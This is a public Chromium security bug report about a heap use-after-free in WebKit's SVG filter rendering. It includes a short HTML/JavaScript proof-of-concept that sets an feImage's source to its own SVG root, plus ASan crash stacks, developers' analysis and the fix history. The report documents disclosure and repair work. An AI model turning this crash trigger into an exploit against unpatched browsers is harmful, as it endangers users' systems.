New issue
Advanced search Search tips

Issue 143761 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Dec 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment

Heap-use-after-free in WebCore::GraphicsContext::restore

Reported by miau...@gmail.com, Aug 20 2012

Issue description



VULNERABILITY DETAILS
use-after-free in WebCore::GraphicsContext::restore

VERSION
Chrome Version: stable, beta, dev
Operating System: linux 64bit precise

REPRODUCTION CASE
<html>
  <head>
    <style>
    </style>
    <script>
      onload = function() {
        el0=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElementNS('http://www.w3.org/2000/svg', 'filter')
        el1.setAttribute('id','el1')
        el0.appendChild(el1)
        el2=document.createElementNS('http://www.w3.org/2000/svg', 'feImage')
        el1.appendChild(el2)
        document.body.offsetTop
        el0.setAttribute('filter', 'url(#el1)')
        el2.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el0')
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: renderer + asan
Crash State: 

==12607== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffebb720ec at pc 0x55555a508f2e bp 0x7ffffffeefc0 sp 0x7ffffffeefb8
READ of size 1 at 0x7fffebb720ec thread T0
    #0 0x55555a508f2d in WebCore::GraphicsContext::restore() ???:0
    #1 0x55555c30d44c in WebCore::RenderSVGRoot::paintReplaced(WebCore::PaintInfo&, WebCore::FractionalLayoutPoint const&) ???:0
    #2 0x55555b7edc70 in WebCore::RenderReplaced::paint(WebCore::PaintInfo&, WebCore::FractionalLayoutPoint const&) ???:0

0x7fffebb720ec is located 108 bytes inside of 144-byte region [0x7fffebb72080,0x7fffebb72110)
freed by thread T0 here:
    #0 0x55555f152d10 in __interceptor_free ??:0
    #1 0x55555a57a0a5 in WebCore::ImageBuffer::~ImageBuffer() ???:0
    #2 0x55555a63aa51 in WebCore::FilterEffect::~FilterEffect() ???:0
    #3 0x55555c5c266d in WebCore::FEImage::~FEImage() ???:0



 
108144-2.html
702 bytes View Download
stable-108144-2.txt
17.3 KB View Download
beta-108144-2.txt
17.3 KB View Download
108144-2.txt
18.7 KB View Download
Cc: pdr@chromium.org fmalita@chromium.org schenney@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecSeverity-High WebKit-SVG OS-All SecImpacts-Stable SecImpacts-Beta
Status: Available
CF report coming - https://cluster-fuzz.appspot.com/testcase?key=96828636
Summary: Heap-use-after-free in WebCore::GraphicsContext::restore
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=96828636

Uploader: aarya@google.com

Crash Type: Heap-use-after-free READ 1
Crash Address: 0x7f5ebc6932ec
Crash State:
  - crash stack -
  WebCore::GraphicsContext::restore
  WebCore::RenderSVGRoot::paintReplaced
  - free stack -
  WebCore::ImageBuffer::~ImageBuffer
  WebCore::FilterEffect::~FilterEffect
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=125849:125919

Minimized Testcase (0.60 Kb):
Download: https://cluster-fuzz.appspot.com/download/AMIfv94TyPA2MSYvf6Wb1Q7pSqFDS0fDObWdbPr7_2rup52CbKZoC0maCGAvsO25W0Go5mSwqSoW77g6AcKQsPhQ1yrwYG7en5l_WG8ypyfERx1gsO5XhYvpDTZuGAsNSzQarIJqNytZE1wiKgtva2dxtnkGmp0EFt4N_6_XSg1fd_Bmlv6ioWY
<script>
      onload = function() {
        el0=document.createElementNS('http://www.w3.org/2000/svg', 'svg')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElementNS('http://www.w3.org/2000/svg', 'filter')
        el1.setAttribute('id','el1')
        el0.appendChild(el1)
        el2=document.createElementNS('http://www.w3.org/2000/svg', 'feImage')
        el1.appendChild(el2)
        document.body.offsetTop
        el0.setAttribute('filter', 'url(#el1)')
        el2.setAttributeNS('http://www.w3.org/1999/xlink', 'xlink:href', '#el0')
      }
    </script>
Labels: Mstone-21
Labels: Security-CodeYellow
Owner: schenney@chromium.org
Status: Assigned
I'll take it.
Could you cc: me on the upstream bug?  I'm curious about the problem.
It's dead simple, although maybe not too simple to fix.

An SVG doc and filter and feImage filter effect are created, but the feImage has no src. Then layout is forced, which has the effect of creating filter data. In the final step, the src of the feImage is set to the root SVG, creating a circular dependency which causes the filter code to free the graphics context it is using while still using it.
It sounds like we either need to extend the cycle detection currently done by FilterEffect to traverse into SVG documents (which might be tricky if the documents were pending external resource loads), or just prohibit SVG documents as FEImage sources altogether (big hammer).
Friendly ping. This bug is reaching a ripe old age. :)
I've spent a bunch of time wrapping my head around it. The problem is that the data needed is not in the places it's needed, so some rather significant refactoring is going to be required. It's the next bug on my agenda.
Labels: -Mstone-21 Mstone-22
Mass move from m21 to m22.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/131488
Project Member

Comment 14 by ClusterFuzz, Oct 17 2012

ClusterFuzz has detected this issue as fixed in range 162270:162321.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=96828636

Uploader: aarya@google.com

Crash Type: Heap-use-after-free READ 1
Crash Address: 0x7f5ebc6932ec
Crash State:
  - crash stack -
  WebCore::GraphicsContext::restore
  WebCore::RenderSVGRoot::paintReplaced
  - free stack -
  WebCore::ImageBuffer::~ImageBuffer
  WebCore::FilterEffect::~FilterEffect
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=125849:125919
Fixed: https://cluster-fuzz.appspot.com/revisions?range=162270:162321

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv94TyPA2MSYvf6Wb1Q7pSqFDS0fDObWdbPr7_2rup52CbKZoC0maCGAvsO25W0Go5mSwqSoW77g6AcKQsPhQ1yrwYG7en5l_WG8ypyfERx1gsO5XhYvpDTZuGAsNSzQarIJqNytZE1wiKgtva2dxtnkGmp0EFt4N_6_XSg1fd_Bmlv6ioWY

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Mstone-22 -Merge-Approved Mstone-23 Merge-Merged reward-topanel
M23: http://trac.webkit.org/changeset/132809

We almost forgot reward-topanel :)
Labels: -reward-topanel reward-1000 reward-unpaid
... but we won't forget to reward at the $1000 level!
Labels: -reward-unpaid
Status: Fixed
Project Member

Comment 19 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-WebKit -SecSeverity-High -WebKit-SVG -SecImpacts-Stable -SecImpacts-Beta -Mstone-23 Cr-Content Security-Impact-Stable Security-Impact-Beta Cr-Content-SVG M-23 Security-Severity-High Type-Bug-Security
Labels: -Restrict-View-SecurityNotify
Project Member

Comment 21 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 22 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 23 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 24 by bugdroid1@chromium.org, Apr 6 2013

Labels: -Cr-Content Cr-Blink
Project Member

Comment 25 by bugdroid1@chromium.org, Apr 6 2013

Labels: -Cr-Content-SVG Cr-Blink-SVG
Project Member

Comment 26 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 27 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 28 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic

Sign in to add a comment